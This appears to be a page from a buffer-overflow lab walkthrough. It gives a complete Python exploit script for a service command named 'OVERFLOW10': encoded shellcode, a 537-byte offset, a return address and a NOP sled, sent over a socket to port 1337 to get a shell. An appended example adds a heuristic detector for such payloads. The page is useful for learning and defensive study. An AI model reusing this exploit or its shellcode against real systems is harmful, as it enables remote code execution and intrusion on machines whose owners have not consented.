Getting a Shell

With a final modification to the PoC, we get a shell.

Adding Nops & Payload

Now that we have all the parts of the puzzle, all we have to do is modify the code one last time to include the newly generated payload, add some NOPs ("\x90") as padding in front of the payload, and run it!

payload.py

#!/usr/bin/python
import socket

try:
    print ("\nSending evil buffer...")

    # Shellcode generated in the previous step. Bytes literals are used
    # throughout so the script behaves the same under Python 2 and Python 3
    # (a str literal would be mis-encoded and rejected by send() on Python 3).
    payload = (b"\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
    b"\x65\x02\xba\x95\x83\xee\xfc\xe2\xf4\x99\xea\x38\x95\x65\x02"
    b"\xda\x1c\x80\x33\x7a\xf1\xee\x52\x8a\x1e\x37\x0e\x31\xc7\x71"
    b"\x89\xc8\xbd\x6a\xb5\xf0\xb3\x54\xfd\x16\xa9\x04\x7e\xb8\xb9"
    b"\x45\xc3\x75\x98\x64\xc5\x58\x67\x37\x55\x31\xc7\x75\x89\xf0"
    b"\xa9\xee\x4e\xab\xed\x86\x4a\xbb\x44\x34\x89\xe3\xb5\x64\xd1"
    b"\x31\xdc\x7d\xe1\x80\xdc\xee\x36\x31\x94\xb3\x33\x45\x39\xa4"
    b"\xcd\xb7\x94\xa2\x3a\x5a\xe0\x93\x01\xc7\x6d\x5e\x7f\x9e\xe0"
    b"\x81\x5a\x31\xcd\x41\x03\x69\xf3\xee\x0e\xf1\x1e\x3d\x1e\xbb"
    b"\x46\xee\x06\x31\x94\xb5\x8b\xfe\xb1\x41\x59\xe1\xf4\x3c\x58"
    b"\xeb\x6a\x85\x5d\xe5\xcf\xee\x10\x51\x18\x38\x6a\x89\xa7\x65"
    b"\x02\xd2\xe2\x16\x30\xe5\xc1\x0d\x4e\xcd\xb3\x62\xfd\x6f\x2d"
    b"\xf5\x03\xba\x95\x4c\xc6\xee\xc5\x0d\x2b\x3a\xfe\x65\xfd\x6f"
    b"\xc5\x35\x52\xea\xd5\x35\x42\xea\xfd\x8f\x0d\x65\x75\x9a\xd7"
    b"\x2d\xff\x60\x6a\x7a\x3d\x65\x6e\xd2\x97\x65\x02\x8f\x1c\x83"
    b"\x68\xaa\xc3\x32\x6a\x23\x30\x11\x63\x45\x40\xe0\xc2\xce\x99"
    b"\x9a\x4c\xb2\xe0\x89\x6a\x4a\x20\xc7\x54\x45\x40\x0d\x61\xd7"
    b"\xf1\x65\x8b\x59\xc2\x32\x55\x8b\x63\x0f\x10\xe3\xc3\x87\xff"
    b"\xdc\x52\x21\x26\x86\x94\x64\x8f\xfe\xb1\x75\xc4\xba\xd1\x31"
    b"\x52\xec\xc3\x33\x44\xec\xdb\x33\x54\xe9\xc3\x0d\x7b\x76\xaa"
    b"\xe3\xfd\x6f\x1c\x85\x4c\xec\xd3\x9a\x32\xd2\x9d\xe2\x1f\xda"
    b"\x6a\xb0\xb9\x5a\x88\x4f\x08\xd2\x33\xf0\xbf\x27\x6a\xb0\x3e"
    b"\xbc\xe9\x6f\x82\x41\x75\x10\x07\x01\xd2\x76\x70\xd5\xff\x65"
    b"\x51\x45\x40")

    prefix = b"OVERFLOW10 "            # command the vulnerable service expects
    filler = b"A" * 537                # offset to EIP found in the earlier step
    eip = b"\xaf\x11\x50\x62" * 4      # 0x625011AF in little-endian, repeated 4x as in the original
    nop = b"\x90" * 32                 # NOP sled in front of the shellcode
    buffer = prefix + filler + eip + nop + payload

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    s.connect(("windows.box", 1337))
    s.send(buffer)

    s.close()

    print ("\nDone!")

except socket.error:
    print ("\nCould not connect!")

Exploitation

python payload.py

And... there we go! We've got a shell 😊
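From the defender's side, the buffer built above has a recognisable shape on the wire: a short text command followed by a long run of one byte, a few non-printable bytes and a NOP sled. The following is an added example (not part of the original walkthrough) that scans a captured TCP payload for that layout; the thresholds and the two sample payloads are constructed assumptions, and the shellcode is replaced by a dummy stand-in.

```python
# Added example: heuristic check for stack-overflow attempts against a text
# protocol, keyed on the layout prefix + filler + return address + NOP sled.
# Thresholds and samples below are assumptions constructed for this example.
import re

MAX_ARG_LEN = 256      # assumed upper bound for a legitimate command argument
NOP_SLED_MIN = 16      # assumed: 16+ consecutive 0x90 bytes counts as a sled
REPEAT_RUN_MIN = 100   # assumed: 100+ identical bytes in a row counts as filler


def analyze_payload(data):
    """Return the list of reasons a payload looks like an overflow attempt."""
    reasons = []
    if len(data) > MAX_ARG_LEN:
        reasons.append("oversized argument (%d bytes)" % len(data))
    if re.search(rb"\x90{%d,}" % NOP_SLED_MIN, data):
        reasons.append("NOP sled")
    run = re.search(rb"(.)\1{%d,}" % (REPEAT_RUN_MIN - 1), data, re.DOTALL)
    if run:
        reasons.append("repeated byte filler (0x%02x)" % run.group(0)[0])
    # A text command followed by raw non-printable bytes is abnormal for
    # a protocol that otherwise carries ASCII arguments.
    if re.match(rb"[A-Z0-9]+ ", data) and re.search(rb"[^\x20-\x7e\r\n]", data):
        reasons.append("binary data after text command")
    return reasons


def is_suspicious(data):
    return bool(analyze_payload(data))


# Constructed samples: the layout from payload.py (with a dummy byte string in
# place of the shellcode) and a benign command to the same service.
ATTACK_SAMPLE = (b"OVERFLOW10 " + b"A" * 537 + b"\xaf\x11\x50\x62" * 4
                 + b"\x90" * 32 + b"\xcc" * 40)
BENIGN_SAMPLE = b"OVERFLOW10 hello\r\n"

if __name__ == "__main__":
    for name, sample in (("attack", ATTACK_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, analyze_payload(sample) or "clean")
```

The same function can be run over payloads pulled from a pcap to flag the sessions worth a closer look.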

Last updated 3 years ago